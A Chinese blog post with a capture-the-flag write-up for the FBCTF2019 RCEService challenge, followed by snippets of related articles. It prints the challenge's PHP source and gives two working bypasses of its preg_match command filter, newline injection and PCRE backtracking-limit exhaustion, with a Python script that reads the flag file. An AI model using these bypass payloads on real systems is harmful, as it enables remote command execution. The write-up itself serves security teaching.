buu-[FBCTF2019]RCEService

最新推荐文章于 2024-08-14 21:43:56 发布
最新推荐文章于 2024-08-14 21:43:56 发布
阅读量304 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53271625/article/details/119678643
版权

buu-[FBCTF2019]RCEService

知识点:

linux命令的使用和目录查询

preg_match()函数的绕过

P神:PHP利用PCRE回溯次数限制绕过某些安全限制

wp

在这里插入图片描述

根据题目的提示,应该就是利用json数据造成远程rce,先小试一下

{"cmd":"ls"}

在这里插入图片描述

发现可以显示,然后尝试其它危险函数,发现都没ban了,卡了好久,无奈查看别的大师傅的wp,原来有源码!

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

简单审计一下,发现过滤掉了好多函数,那现在主要就是去想办法绕过preg_match()函数

方法一:

preg_match()函数只能匹配第一行数据,可以使用换行符%0a绕过,payload如下:

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

这里为什么要是用/bin/cat,审计代码会发现,刚开始设置了路径,所以在这里我们要使用cat的绝对路径,那为什么ls可以用呢,猜测应该是ls的二进制在目录下

然后看大佬的wp发现还有一种方法:P神:PHP利用PCRE回溯次数限制绕过某些安全限制

方法二:

可以先参考一下上面的链接了解一下,原理很简单,上脚本:

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://1147c940-0749-4183-b3f9-035f43b26a3d.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)

<html>
  <body>
    <h1>Web Adminstration Interface</h1>

Attempting to run command:<br/>flag{f8ee7880-edfc-4ed3-8bd9-4d541dcfaa3c}
<br/><br/>
    <form>
      Enter command as JSON:
      <input name="cmd" />
    </form>
  </body>
</html>
Y1n9
关注
[FBCTF2019]RCEService
小飒的博客
07-07 839
看完p神的文章觉得收益匪浅,打算记录下 本题知识点为对preg_match的绕过 看wp这题是有源码的 方法1 开头的 ^ 和结尾的 $ 让PHP从字符串开头检查到结尾 对于这种类型的可以使用%0a绕过 平时做题也遇到过 putenv(‘PATH=/home/rceservice/jail’); 意思是:配置系统环境变量到/home/rceservice/jail,一般是配置到/bin目录下,例如我的环境变量就有/usr/local/sbin 、 /usr/local/bin 、/usr/sbin 、 /u
buu-[2019红帽杯]easyRE
qaq517384的博客
03-05 576
查壳 64位ida 直接查看字符串能看到you found me和一些奇怪字符串 有些类似base的东西 先找you found me 跟进后CTRL+X交叉引用找到函数,f5查看伪代码 signed __int64 sub_4009C6() { signed __int64 result; // rax __int64 v1; // ST10_8 __int64 v2; // ST18_8 __int64 v3; // ST20_8 __int64 v4; // ST28_8
[FBCTF2019]RCEService1
最新发布
kw741951的博客
08-14 312
payload = '{"cmd":"/bin/cat /home/rceservice/flag ","nayi":"' + "a"*(1000000) + '"}' #超过一百万,这里写一千万不会出结果。cat在这里仍然不能用。应该是环境变量配置被改变,所以需要使用/bin/cat调用命令。接下来就记录过滤了那些关键字。发现键盘上有的特殊符号好像都被过滤。它给出了提示要求json格式,先尝试一下{"cmd":"ls"}flag在home目录下,不知道为什么find命令返回为空。
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 689
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
buu-[GUET-CTF2019]re
qaq517384的博客
02-28 275
64位upx壳
BUUCTF [FBCTF2019]go_get_the_flag
weixin_53349587的博客
12-10 974
1.拿到文件,查壳: E ELF文件,64位。 不难发现这个文件相比正常文件要大的多,猜测是用go语言写的。 2.IDA打开,找到函数部分: 全是未知函数。 同时运行程序后搜索关键字符串,结果是一堆特别长的字符串,分析了半天,什么也没分析出来。。。 这种情况下,需要进行go语言去符号化。 3.去符号化之后,重新查看函数: 函数正常多了,我们找到main_main函数: 也没有什么线索。 此时注意到main_main函数下面有一个main_checkpassword...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU-RSA [RoarCTF2019]babyRSA(威尔逊定理)
晓寒的博客
07-21 2952
[RoarCTF2019]babyRSA(威尔逊定理) 题目 import sympy import random def myGetPrime(): A= getPrime(513) print(A) B=A-random.randint(1e3,1e5) print(B) return sympy.nextPrime((B!)%A) p=myGetPrime() #A1=2185696345246163043734827843419143400006607675
BUU [FBCTF2019]RCEService
Jay17的博客
03-13 563
BUU [FBCTF2019]RCEService
FBCTF2019-RCEService
anwen12的博客
02-26 252
0x01 题目初现 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值